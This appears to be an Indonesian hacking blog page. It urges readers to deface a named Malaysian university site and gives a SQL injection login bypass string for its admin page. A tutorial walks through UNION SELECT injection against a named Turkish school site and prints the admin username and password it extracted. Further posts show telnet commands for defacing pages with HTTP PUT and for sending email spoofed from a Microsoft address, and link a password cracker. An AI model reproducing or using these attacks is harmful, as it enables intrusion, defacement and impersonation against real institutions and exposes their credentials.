kita rame rame deface malaysia

linknya ne : http://www.kelantan.uitm.edu.my/spmk/admin_login.php

username : 1'or'1'='1
password : 1'or'1'='1

persebahan devilzcode.co.nr buat detik.com ....kita bela indonesia sampe mati
thnxs

petimati
READ MORE - kita hack rame rame website malasyia
Deface web menggunakan SQL Injection pada X-Ice System V-1


Cara mendeface website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak vulnerability dari situs-situs yang masih bisa dideface

Untuk mencari targetnya, silahkan menggunakan keyword inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.sinopagsl.k12.tr/devami.asp?id=22 (http://fasha.kokarga.com/2009/03/deface-web-menggunakan-sql-injection-pada-x-ice-system-v-1/)

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 22-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id='.
/devami.asp, line 8

Setelah ini kita akan.mencari username nya dengan mengganti angka 22 dengan

-22+union+select+0,kullaniciadi,2,3,4,5,6,7+from+ad min

kurang lebih alamat di browser seperti ini :
http://www.sinopagsl.k12.tr/devami.asp?id=-22+union+select+0,kullaniciadi,2,3,4,5,6,7+from+ad min
http://img18.imageshack.us/img18/9146/38974260ue3.jpg
sekarang kita dapatkan usernamenya adalah burhanettin

selanjutnya mencari password dengan cara mengganti angka 22 dengan

-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
kurang lebih alamat di browser seperti ini :
http://www.sinopagsl.k12.tr/devami.asp?id=-22+union+select+0,sifre,2,3,4,5,6,7+from+admin
http://img12.imageshack.us/img12/808/49381396qr8.jpg
passwordnya adalah sagsl

Sekarang login sebagai admin
http://img19.imageshack.us/img19/4578/22901836fh7.jpg
http://www.sinopagsl.k12.tr /admin/kontrol.asp
selanjutnya terserah anda….
http://img8.imageshack.us/img8/7313/26276791ek1.jpg
READ MORE - Deface web menggunakan SQL Injection pada X-Ice System V-1
Mengenal Microsoft Telnet
Microsoft telnet adalah program bawaan dari windows. Program ini berguna untuk mengakses ke web, untuk keperluan upload data, dll. Tapi program ini justru dimanfaatkan oleh hacker-hacker seperti X-Nitro misalnya Program ini fungsinya sama dengan NetCat. Disini aye menyertakan program netcat agar tidak bingung. Program netcat, adalah program yang paling sering digunakan oleh hacker.
Menggunakan Netcat Untuk keperluan Upload data
Seperti pada tujuannya, bahwa netcat berfungsi untuk keperluan upload data ke web. Sekarang kita akan mencoba meng-upload data ke-web dengan netcat. Halaman utama biasanya adalah : index.htm atau index.html Nah coba bayangkan jika halaman itu diganti oleh kita/ di deface...:devilish:

Nah ini cara menggunakan telnetnya.

Pertama,
Klik Start, Run lalu Ketikan telnet.exe
Setelah muncul maka ketikan

Welcome to Telnet Client

Escape Character is 'CTRL + ]'

Microsoft Telnet > o www.target.com 80
PUT /index.html HTTP/1.1
Host:www.target.com
Content-Legth: 23

Kabayan


(enter)

* setelah selesai mengetikkan

Kabayan

lalu tekan Enter, kata (enter) diatas jgn ikut di ketik

Ket :
0http://www.target.com/80 berarti perintah untuk telnet membuka http://www.target.com/ dengan port 80. Port 80 adalah port untuk akses upload file dan tidak harus selalu menggunakan port 80, bisa juga menggunakan akses port darurat, jika port 80 tertutup. Misal 123, 123456 atau brapa saja lah terserah :cheers:
Menggunakan Telnet Untuk mengirim e-mail palsu
Saat menerima e-mail dari seseorang, janganlah langsung percaya. Misalkan, mendapat e-mail dari billgates. dengan alamat e-mail : bgates@microsoft.com yang mengirimkan e-mail tanpa alasan jelas. Sebenarnya itu adalah ulah hacker-hacker bocah http://www.kaskus.us/images/smilies/sumbangan/6.gif

Caranya ;
Klik Start, Run. Ketikan telnet.exe
Setelah muncul maka ketikan

Code:
Welcome to Telnet Client

Escape Character is 'CTRL + ]'

Microsoft Telnet > [B]o web40609.mail.yahoo.com 80
[b]EHLO
MAIL FROM:bgates@microsoft.com
RCPT TO:you.domain.com
Hello, i'm gates
(enter)

* printah (enter) sama dengan yg di atas

Kode : o web40609.mail.yahoo.com 25 kode diatas untuk membuka SMTP pada web dan bisa mengganti SMTP dengan alamat lain yang diinstall SMTP. Kali ini aye menggunakan SMTP yahoo. Port 25 adalah port untuk mengakses SMTP.

Selamat mencoba....
READ MORE - [Hacking] Belajar Menggunakan Microsoft Telnet

Brutus 2006

  yaitu untukk mengekrack password. . . .
anda bisa dowload di sisni.
READ MORE - Brutus 2006
preload preload preload